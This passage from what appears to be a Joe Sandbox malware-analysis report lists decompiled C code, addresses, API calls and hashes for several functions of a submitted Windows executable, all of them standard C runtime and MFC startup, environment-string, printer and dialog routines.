                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$H_prolog$ActiveCaptureFocusLastPopup
                                                                              • String ID:
                                                                              • API String ID: 2915395904-0
                                                                              • Opcode ID: b62ee04c23a13f0bd83a9e0e49ecaf945f0d50509f571791ea39a6503b8646e5
                                                                              • Instruction ID: 26e2887db0a61a0bb4f3fdb75b2b2bcb1c5cde77713997e6556b935bb4b12a92
                                                                              • Opcode Fuzzy Hash: b62ee04c23a13f0bd83a9e0e49ecaf945f0d50509f571791ea39a6503b8646e5
                                                                              • Instruction Fuzzy Hash: 84410D70700229ABCB14AB76EC44E7F7BADEF45380B50442FF501D7281DBA9CC4146E9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00412D5E, Relevance: 12.1, APIs: 8, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			_entry_(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t35;
				struct HINSTANCE__* _t38;
				void* _t40;
				intOrPtr _t47;
				signed int _t50;
				intOrPtr _t52;
				signed int _t63;
				signed int _t64;
				long _t68;
				void* _t70;
				intOrPtr* _t77;
				long _t78;
				struct _OSVERSIONINFOA* _t84;
				signed int _t86;
				void* _t89;
				struct _OSVERSIONINFOA* _t90;

				_push(0x60);
				E00412BA4(__ebx, __edi, __esi);
				E00412260(0x94, __ecx, 0x44bc68);
				 *(_t89 - 0x18) = _t90;
				_t84 = _t90;
				_t84->dwOSVersionInfoSize = 0x94;
				GetVersionExA(_t84);
				_t68 = _t84->dwPlatformId;
				 *0x45a3f0 = _t68;
				_t35 = _t84->dwMajorVersion;
				 *0x45a3fc = _t35;
				_t78 = _t84->dwMinorVersion;
				 *0x45a400 = _t78;
				_t86 = _t84->dwBuildNumber & 0x00007fff;
				 *0x45a3f4 = _t86;
				if(_t68 != 2) {
					 *0x45a3f4 = _t86 | 0x00008000;
				}
				 *0x45a3f8 = (_t35 << 8) + _t78;
				_t38 = GetModuleHandleA(0);
				if(_t38->i != 0x5a4d) {
					L6:
					 *(_t89 - 0x1c) = 0;
				} else {
					_t77 =  *((intOrPtr*)(_t38 + 0x3c)) + _t38;
					if( *_t77 != 0x4550) {
						goto L6;
					} else {
						_t63 =  *(_t77 + 0x18) & 0x0000ffff;
						if(_t63 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t77 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t77 + 0x74)) <= 0xe) {
								goto L6;
							} else {
								_t64 = 0;
								__eflags =  *(_t77 + 0xe8);
								goto L11;
							}
						} else {
							if(_t63 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t77 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t77 + 0x84)) <= 0xe) {
									goto L6;
								} else {
									_t64 = 0;
									__eflags =  *(_t77 + 0xf8);
									L11:
									_t14 = __eflags != 0;
									__eflags = _t14;
									 *(_t89 - 0x1c) = _t64 & 0xffffff00 | _t14;
								}
							} else {
								goto L6;
							}
						}
					}
				}
				if(E00414943(1) == 0) {
					E00412D3A(0x1c);
				}
				_t40 = E0041640C();
				_t100 = _t40;
				if(_t40 == 0) {
					E00412D3A(0x10);
				}
				E00417AF7(_t100);
				 *(_t89 - 4) = 0;
				if(E004178F9() < 0) {
					E00412D15(0x1b);
				}
				 *0x45be90 = GetCommandLineA();
				 *0x45a3e0 = E004177D7();
				if(E00417735() < 0) {
					E00412D15(8);
				}
				if(E00417502() < 0) {
					E00412D15(9);
				}
				_t47 = E00413057(1);
				_pop(_t70);
				 *((intOrPtr*)(_t89 - 0x28)) = _t47;
				if(_t47 != 0) {
					E00412D15(_t47);
					_pop(_t70);
				}
				 *(_t89 - 0x44) = 0;
				GetStartupInfoA(_t89 - 0x70);
				 *((intOrPtr*)(_t89 - 0x20)) = E004174A5();
				_t105 =  *(_t89 - 0x44) & 0x00000001;
				if(( *(_t89 - 0x44) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t89 - 0x40) & 0x0000ffff;
				}
				_t52 = E004224CB(_t70, _t105, GetModuleHandleA(0), 0,  *((intOrPtr*)(_t89 - 0x20)), _t50);
				_t82 = _t52;
				 *((intOrPtr*)(_t89 - 0x2c)) = _t52;
				if( *(_t89 - 0x1c) == 0) {
					E00413184(_t82);
				}
				E004131A6();
				 *(_t89 - 4) =  *(_t89 - 4) | 0xffffffff;
				return E00412BDF(_t82);
			}



















                                                                              0x00412d5e
                                                                              0x00412d65
                                                                              0x00412d71
                                                                              0x00412d76
                                                                              0x00412d79
                                                                              0x00412d7b
                                                                              0x00412d7e
                                                                              0x00412d84
                                                                              0x00412d87
                                                                              0x00412d8d
                                                                              0x00412d90
                                                                              0x00412d95
                                                                              0x00412d98
                                                                              0x00412da1
                                                                              0x00412da7
                                                                              0x00412db0
                                                                              0x00412db8
                                                                              0x00412db8
                                                                              0x00412dc3
                                                                              0x00412dd1
                                                                              0x00412dd8
                                                                              0x00412df9
                                                                              0x00412df9
                                                                              0x00412dda
                                                                              0x00412ddd
                                                                              0x00412de5
                                                                              0x00000000
                                                                              0x00412de7
                                                                              0x00412de7
                                                                              0x00412df0
                                                                              0x00412e11
                                                                              0x00412e15
                                                                              0x00000000
                                                                              0x00412e17
                                                                              0x00412e17
                                                                              0x00412e19
                                                                              0x00000000
                                                                              0x00412e19
                                                                              0x00412df2
                                                                              0x00412df7
                                                                              0x00412dfe
                                                                              0x00412e05
                                                                              0x00000000
                                                                              0x00412e07
                                                                              0x00412e07
                                                                              0x00412e09
                                                                              0x00412e1f
                                                                              0x00412e1f
                                                                              0x00412e1f
                                                                              0x00412e22
                                                                              0x00412e22
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00412df7
                                                                              0x00412df0
                                                                              0x00412de5
                                                                              0x00412e2f
                                                                              0x00412e33
                                                                              0x00412e38
                                                                              0x00412e39
                                                                              0x00412e3e
                                                                              0x00412e40
                                                                              0x00412e44
                                                                              0x00412e49
                                                                              0x00412e4a
                                                                              0x00412e4f
                                                                              0x00412e59
                                                                              0x00412e5d
                                                                              0x00412e62
                                                                              0x00412e69
                                                                              0x00412e73
                                                                              0x00412e7f
                                                                              0x00412e83
                                                                              0x00412e88
                                                                              0x00412e90
                                                                              0x00412e94
                                                                              0x00412e99
                                                                              0x00412e9c
                                                                              0x00412ea1
                                                                              0x00412ea2
                                                                              0x00412ea7
                                                                              0x00412eaa
                                                                              0x00412eaf
                                                                              0x00412eaf
                                                                              0x00412eb0
                                                                              0x00412eb7
                                                                              0x00412ec2
                                                                              0x00412ec5
                                                                              0x00412ec9
                                                                              0x00412ed3
                                                                              0x00412ecb
                                                                              0x00412ecb
                                                                              0x00412ecb
                                                                              0x00412edd
                                                                              0x00412ee2
                                                                              0x00412ee4
                                                                              0x00412eea
                                                                              0x00412eed
                                                                              0x00412eed
                                                                              0x00412ef2
                                                                              0x00412f24
                                                                              0x00412f32

                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?,0044BC68,00000060), ref: 00412D7E
                                                                              • GetModuleHandleA.KERNEL32(00000000,?,0044BC68,00000060), ref: 00412DD1
                                                                              • _fast_error_exit.LIBCMT ref: 00412E33
                                                                              • _fast_error_exit.LIBCMT ref: 00412E44
                                                                              • GetCommandLineA.KERNEL32(?,0044BC68,00000060), ref: 00412E63
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00412EB7
                                                                              • __wincmdln.LIBCMT ref: 00412EBD
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00412EDA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule_fast_error_exit$CommandInfoLineStartupVersion__wincmdln
                                                                              • String ID:
                                                                              • API String ID: 3897392166-0
                                                                              • Opcode ID: e7de573366e18692071b5f73743a0ee6d0bb9c350bc7485548209224508de0fc
                                                                              • Instruction ID: e39f2213261bf95a39a70617c0542d3cca9913f4f7838575e9a6613787c2c189
                                                                              • Opcode Fuzzy Hash: e7de573366e18692071b5f73743a0ee6d0bb9c350bc7485548209224508de0fc
                                                                              • Instruction Fuzzy Hash: 2941B270D003158ADB25AF75EA056EE36B0BF44719F20442FE415EB292DBBC89D2CB9D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004177D7, Relevance: 12.1, APIs: 8, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 98%
                                                                              			E004177D7() {
				int _v4;
				int _v8;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t29;
				void* _t34;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x45a720; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					if(_t7 != 1) {
						if(_t7 == _t38 || _t7 == _t29) {
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							if(_t37 == _t29) {
								goto L20;
							}
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E00412247(_t8 - _t37 + 1);
								if(_t34 != _t29) {
									E00411AC0(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
							} while ( *_t8 != _t29);
							goto L25;
						} else {
							L20:
							return 0;
						}
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E00412247(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									if(WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29) == 0) {
										_push(_v8);
										E00412A4D();
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					if(GetLastError() != 0x78) {
						_t7 =  *0x45a720; // 0x1
					} else {
						_t7 = _t38;
						 *0x45a720 = _t7;
					}
					goto L6;
				} else {
					 *0x45a720 = 1;
					goto L7;
				}
			}

















                                                                              0x004177d9
                                                                              0x004177e8
                                                                              0x004177ea
                                                                              0x004177f0
                                                                              0x004177f1
                                                                              0x00417820
                                                                              0x00417823
                                                                              0x004178a4
                                                                              0x004178ae
                                                                              0x004178b4
                                                                              0x004178b8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004178bc
                                                                              0x004178c8
                                                                              0x004178cb
                                                                              0x004178d3
                                                                              0x004178d8
                                                                              0x004178e1
                                                                              0x004178da
                                                                              0x004178da
                                                                              0x004178da
                                                                              0x004178ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004178be
                                                                              0x004178be
                                                                              0x004178be
                                                                              0x004178be
                                                                              0x004178bf
                                                                              0x004178c3
                                                                              0x004178c4
                                                                              0x00000000
                                                                              0x004178aa
                                                                              0x004178aa
                                                                              0x00000000
                                                                              0x004178aa
                                                                              0x004178a4
                                                                              0x00417825
                                                                              0x00417827
                                                                              0x00417831
                                                                              0x00417834
                                                                              0x00417836
                                                                              0x00417846
                                                                              0x00417854
                                                                              0x00417859
                                                                              0x0041785f
                                                                              0x00417863
                                                                              0x00417866
                                                                              0x0041786e
                                                                              0x00417872
                                                                              0x00417883
                                                                              0x00417885
                                                                              0x00417889
                                                                              0x0041788f
                                                                              0x0041788f
                                                                              0x00417893
                                                                              0x00417893
                                                                              0x00417872
                                                                              0x00417898
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417838
                                                                              0x00417838
                                                                              0x00417838
                                                                              0x00417838
                                                                              0x0041783a
                                                                              0x0041783f
                                                                              0x00417841
                                                                              0x00000000
                                                                              0x00417838
                                                                              0x0041782b
                                                                              0x0041782f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041782f
                                                                              0x004177f5
                                                                              0x004177f9
                                                                              0x00417810
                                                                              0x0041781b
                                                                              0x00417812
                                                                              0x00417812
                                                                              0x00417814
                                                                              0x00417814
                                                                              0x00000000
                                                                              0x004177fb
                                                                              0x004177fb
                                                                              0x00000000
                                                                              0x004177fb

                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32(74B04DE0,00000000,?,?,?,?,00412E73,?,0044BC68,00000060), ref: 004177F3
                                                                              • GetLastError.KERNEL32(?,?,?,?,00412E73,?,0044BC68,00000060), ref: 00417807
                                                                              • GetEnvironmentStringsW.KERNEL32(74B04DE0,00000000,?,?,?,?,00412E73,?,0044BC68,00000060), ref: 00417829
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,74B04DE0,00000000,?,?,?,?,00412E73), ref: 0041785D
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00412E73,?,0044BC68,00000060), ref: 0041787F
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00412E73,?,0044BC68,00000060), ref: 00417898
                                                                              • GetEnvironmentStrings.KERNEL32(74B04DE0,00000000,?,?,?,?,00412E73,?,0044BC68,00000060), ref: 004178AE
                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004178EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 883850110-0
                                                                              • Opcode ID: 6000828566af01fef4d8e1c6a40a408aa4e19570ac13028f7f3b67f35117f121
                                                                              • Instruction ID: 1d95b8d08a7fe6b5b7f5d9d151d5b52b6a96979c5d7756129b4b05627891fd48
                                                                              • Opcode Fuzzy Hash: 6000828566af01fef4d8e1c6a40a408aa4e19570ac13028f7f3b67f35117f121
                                                                              • Instruction Fuzzy Hash: C631067250C2556FDB203B659C888BBBBBCEF49398725053BF146C3211E6688CC1C2BE
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041FE10, Relevance: 12.1, APIs: 8, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E0041FE10(short* _a4) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				signed int _t22;
				char* _t38;
				short* _t47;
				int _t49;
				int _t56;
				intOrPtr _t62;

				_push(0xffffffff);
				_push(E00431520);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t47 = _a4;
				_v20 = _t62 - 0x10;
				if(_t47 == 0) {
					L8:
					__eflags = 0;
					 *[fs:0x0] = _v16;
					return 0;
				} else {
					_t56 = E0041229D(_t47) + 1;
					_v24 = _t56;
					_t49 = WideCharToMultiByte(0, 0, _t47, _t56, 0, 0, 0, 0);
					_v28 = _t49;
					if(_t49 != 0) {
						_v8 = 0;
						_t38 = E00424440(_t49);
						__eflags = _t38;
						_v8 = 0xffffffff;
						if(_t38 != 0) {
							__eflags = WideCharToMultiByte(0, 0, _a4, _t56, _t38, _t49, 0, 0);
							if(__eflags == 0) {
								_push(_t38);
								L0042446B(_t38, _t49, _t56, __eflags);
								_t38 = 0;
								_t21 = GetLastError();
								__eflags = _t21;
								if(_t21 > 0) {
									_t22 = GetLastError();
									_t24 = _t22 & 0x0000ffff | 0x80070000;
									__eflags = _t22 & 0x0000ffff | 0x80070000;
								} else {
									_t24 = GetLastError();
								}
								E0041FC30(_t24);
							}
							 *[fs:0x0] = _v16;
							return _t38;
						} else {
							E0041FC30(0x8007000e);
							goto L8;
						}
					} else {
						if(GetLastError() > 0) {
							E0041FC30(GetLastError() & 0x0000ffff | 0x80070000);
							__eflags = 0;
							 *[fs:0x0] = _v16;
							return 0;
						} else {
							E0041FC30(GetLastError());
							 *[fs:0x0] = _v16;
							return 0;
						}
					}
				}
			}



















                                                                              0x0041fe13
                                                                              0x0041fe15
                                                                              0x0041fe20
                                                                              0x0041fe21
                                                                              0x0041fe2e
                                                                              0x0041fe33
                                                                              0x0041fe36
                                                                              0x0041fef7
                                                                              0x0041fef7
                                                                              0x0041fefc
                                                                              0x0041ff09
                                                                              0x0041fe3c
                                                                              0x0041fe4f
                                                                              0x0041fe56
                                                                              0x0041fe5f
                                                                              0x0041fe63
                                                                              0x0041fe66
                                                                              0x0041feb9
                                                                              0x0041fec8
                                                                              0x0041fee2
                                                                              0x0041fee4
                                                                              0x0041feeb
                                                                              0x0041ff21
                                                                              0x0041ff23
                                                                              0x0041ff25
                                                                              0x0041ff26
                                                                              0x0041ff34
                                                                              0x0041ff36
                                                                              0x0041ff38
                                                                              0x0041ff3a
                                                                              0x0041ff40
                                                                              0x0041ff47
                                                                              0x0041ff47
                                                                              0x0041ff3c
                                                                              0x0041ff3c
                                                                              0x0041ff3c
                                                                              0x0041ff4d
                                                                              0x0041ff4d
                                                                              0x0041ff59
                                                                              0x0041ff64
                                                                              0x0041feed
                                                                              0x0041fef2
                                                                              0x00000000
                                                                              0x0041fef2
                                                                              0x0041fe68
                                                                              0x0041fe72
                                                                              0x0041fe9e
                                                                              0x0041fea3
                                                                              0x0041fea8
                                                                              0x0041feb5
                                                                              0x0041fe74
                                                                              0x0041fe77
                                                                              0x0041fe81
                                                                              0x0041fe8e
                                                                              0x0041fe8e
                                                                              0x0041fe72
                                                                              0x0041fe66

                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 0041FE59
                                                                              • GetLastError.KERNEL32 ref: 0041FE6E
                                                                              • GetLastError.KERNEL32 ref: 0041FE74
                                                                              • GetLastError.KERNEL32 ref: 0041FE91
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 0041FF1B
                                                                              • GetLastError.KERNEL32 ref: 0041FF36
                                                                              • GetLastError.KERNEL32 ref: 0041FF3C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 3361762293-0
                                                                              • Opcode ID: fecaefe3e211d7647a63063ff122df463c4eda3e344745a5b9ee0a1726c1b895
                                                                              • Instruction ID: 124527d97ceff0da58b9e06ee148f11ea4f0a8120544b77b93a5adb531dfb126
                                                                              • Opcode Fuzzy Hash: fecaefe3e211d7647a63063ff122df463c4eda3e344745a5b9ee0a1726c1b895
                                                                              • Instruction Fuzzy Hash: 94312D73B40718AAD320EB65AD02BABBB68EB45764F10017BFD08D3381D679581685D9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042386A, Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E0042386A(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x70);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x6c);
							if( *(_t35 + 0x6c) != 0) {
								E0042AC36(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x6c) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0042AC36( *(_t35 + 0x6c));
								 *(_t35 + 0x6c) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                              0x0042386d
                                                                              0x0042386f
                                                                              0x00423871
                                                                              0x00423879
                                                                              0x00423893
                                                                              0x0042389b
                                                                              0x004238a5
                                                                              0x004238ac
                                                                              0x004238ae
                                                                              0x004238b3
                                                                              0x004238b6
                                                                              0x004238b6
                                                                              0x004238cd
                                                                              0x004238d4
                                                                              0x004238ec
                                                                              0x004238f1
                                                                              0x004238f6
                                                                              0x004238f6
                                                                              0x004238fc
                                                                              0x004238fc
                                                                              0x004238ac
                                                                              0x00423901
                                                                              0x00423905

                                                                              APIs
                                                                              • GlobalLock.KERNEL32 ref: 00423887
                                                                              • lstrcmpA.KERNEL32(?,?), ref: 00423893
                                                                              • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 004238A5
                                                                              • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004238C5
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004238CD
                                                                              • GlobalLock.KERNEL32 ref: 004238D7
                                                                              • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004238E4
                                                                              • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004238FC
                                                                                • Part of subcall function 0042AC36: GlobalFlags.KERNEL32(?), ref: 0042AC40
                                                                                • Part of subcall function 0042AC36: GlobalUnlock.KERNEL32(?,00000000,?,004238F6,?,00000000,?,?,00000000,00000000,00000002), ref: 0042AC51
                                                                                • Part of subcall function 0042AC36: GlobalFree.KERNEL32 ref: 0042AC5C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                              • String ID:
                                                                              • API String ID: 168474834-0
                                                                              • Opcode ID: a80ad83adf27fd997470dd9de678f8190c393b3af6f62724f7ee089163f35a53
                                                                              • Instruction ID: 1752808c9f65d41e51f4affcf3997c4520a7e2a2ffb237983be52013856d63c8
                                                                              • Opcode Fuzzy Hash: a80ad83adf27fd997470dd9de678f8190c393b3af6f62724f7ee089163f35a53
                                                                              • Instruction Fuzzy Hash: 9511C472200108BFDB216FA6DC45D6FBABDFB85704B50442EFA01D1111D679CA51EB68
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00408AD1, Relevance: 10.7, APIs: 7, Instructions: 247memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 67%
                                                                              			E00408AD1(void* __esi) {
				void* __ebx;
				intOrPtr _t132;
				int* _t133;
				int _t138;
				intOrPtr* _t139;
				int _t142;
				int* _t143;
				int _t146;
				int _t171;
				intOrPtr _t172;
				int _t173;
				intOrPtr _t178;
				int _t183;
				int _t186;
				void* _t187;
				int* _t191;
				void* _t213;
				int* _t216;
				short _t217;
				intOrPtr* _t225;
				void* _t227;
				struct tagRECT _t228;
				int* _t229;
				signed int _t233;
				int* _t235;
				int* _t237;
				int* _t238;
				void* _t239;

				_t227 = __esi;
				E004128A0(E00430E13, _t239);
				_t132 =  *0x457184; // 0xb7aa1229
				_t225 =  *((intOrPtr*)(_t239 + 0x14));
				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
				_t183 = 0;
				_t133 = _t225 + 0x12;
				 *(_t239 - 0x34) = _t133;
				if( *(_t239 + 0x10) != 0) {
					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
					 *((short*)(_t239 - 0x4a)) =  *_t133;
					_t216 = _t225 + 0x18;
					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
					_t225 = _t239 - 0x58;
					 *(_t239 - 0x34) = _t216;
				}
				_t217 =  *((short*)(_t225 + 0xa));
				_push(_t227);
				_t228 =  *((short*)(_t225 + 8));
				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
				 *(_t239 - 0x68) = _t228;
				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
				_t229 =  *(_t239 + 0x1c);
				 *(_t239 - 0x28) = _t183;
				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
					_t186 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
					_t229 =  &(_t229[1]);
					if(_t186 > 0) {
						__imp__#4(_t229, _t186);
						_t187 = _t186 + _t186;
						_t229 = _t229 + _t187;
						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
						 *(_t239 - 0x28) = _t138;
					}
					_t183 = 0;
				}
				 *(_t239 - 0x2c) = _t183;
				_t139 = E00428A50();
				_t218 =  *_t139;
				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
				 *(_t239 - 4) = _t183;
				 *(_t239 - 0x38) = _t183;
				 *(_t239 - 0x3c) = _t183;
				 *(_t239 - 0x30) = _t183;
				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
					_t142 =  *_t229;
					_t49 = _t142 - 0xc; // -28
					_t191 = _t49;
					_t229 =  &(_t229[3]);
					 *(_t239 - 0x40) = _t142;
					 *(_t239 + 0x1c) = _t191;
					if(_t191 > _t183) {
						do {
							_t171 =  *_t229;
							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
